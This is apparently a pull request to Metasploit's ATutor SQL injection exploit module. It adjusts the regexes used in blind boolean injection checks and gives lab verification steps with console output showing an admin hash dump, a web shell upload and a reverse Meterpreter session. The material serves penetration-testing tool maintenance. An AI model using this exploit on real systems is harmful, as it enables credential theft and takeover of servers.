### PR TITLE
Update the regex for the number of students in ATutor

### DIFF
--- a/modules/exploits/multi/http/atutor_sqli.rb
+++ b/modules/exploits/multi/http/atutor_sqli.rb
@@ -243,7 +243,7 @@ class Metasploit3 < Msf::Exploit::Remote
        mid = (lower + upper) / 2
        sqli = "#{sql}>#{mid}"
        result = perform_request(sqli, cookie)
-       if result =~ /There are \d{0,8} entries\./
+       if result =~ /There are \d+ entries\./
         lower = mid + 1
        else
         upper = mid
@@ -254,7 +254,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
        sqli = "#{sql}=#{lower}"
        result = perform_request(sqli, cookie)
-       if result =~ /There are \d{0,8} entries\./
+       if result =~ /There are \d+ entries\./
           value = lower
        end
     end
@@ -265,12 +265,12 @@ class Metasploit3 < Msf::Exploit::Remote
     if do_test
       if do_true
         result = perform_request("1=1", cookie)
-        if result =~ /There are \d{0,8} entries\./
+        if result =~ /There are \d+ entries\./
           return true
         end
       else not do_true
         result = perform_request("1=2", cookie)
-        if not result =~ /There are \d{0,8} entries\./
+        if not result =~ /There are \d+ entries\./
           return true
         end
       end

--- a/modules/exploits/multi/http/atutor_sqli.rb
+++ b/modules/exploits/multi/http/atutor_sqli.rb
@@ -243,7 +243,7 @@ class Metasploit3 < Msf::Exploit::Remote
        mid = (lower + upper) / 2
        sqli = "#{sql}>#{mid}"
        result = perform_request(sqli, cookie)
-       if result =~ /There are \d entries./
+       if result =~ /There are \d{0,8} entries\./
         lower = mid + 1
        else
         upper = mid
@@ -254,7 +254,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
        sqli = "#{sql}=#{lower}"
        result = perform_request(sqli, cookie)
-       if result =~ /There are \d entries./
+       if result =~ /There are \d{0,8} entries\./
           value = lower
        end
     end
@@ -265,12 +265,12 @@ class Metasploit3 < Msf::Exploit::Remote
     if do_test
       if do_true
         result = perform_request("1=1", cookie)
-        if result =~ /There are \d entries./
+        if result =~ /There are \d{0,8} entries\./
           return true
         end
       else not do_true
         result = perform_request("1=2", cookie)
-        if not result =~ /There are \d entries./
+        if not result =~ /There are \d{0,8} entries\./
           return true
         end
       end


### PR DESCRIPTION
## What this patch does

At the suggestion of @net-ninja, we have decided to update the regexes for the number of students found in the database. Functionality wise everything should feel the same for the user.
## Verification
- [x] Download the vulnearble version of ATutor, [like this one](http://iweb.dl.sourceforge.net/project/atutor/ATutor%202/ATutor-2.2.1.tar.gz), and install it.
- [x] Start msfconsole
- [x] Do: `use exploit/multi/http/atutor_sqli`
- [x] Set username and password
- [x] Do: `run`
- [x] You should get a shell like the following example:

```
msf exploit(atutor_sqli) > check
[+] The target is vulnerable.
msf exploit(atutor_sqli) > run

[*] Started reverse TCP handler on 192.168.1.199:4444 
[*] 192.168.1.202:80 - Logged in as admin, sending a few test injections...
[*] 192.168.1.202:80 - Dumping username and password hash...
[+] 192.168.1.202:80 - Got the admin hash: bcbc84567720217d190cab05ac3bf7722f2936ca !
[*] 192.168.1.202:80 - Logged in as admin, uploading shell...
[+] 192.168.1.202:80 - Shell upload successful!
[*] Sending stage (33684 bytes) to 192.168.1.202
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.202:49298) at 2016-03-01 09:58:19 -0600
[+] 192.168.1.202:80 - Deleted uevw.php
[+] 192.168.1.202:80 - Deleted ../../content/module/rxc/uevw.php

meterpreter > 
```
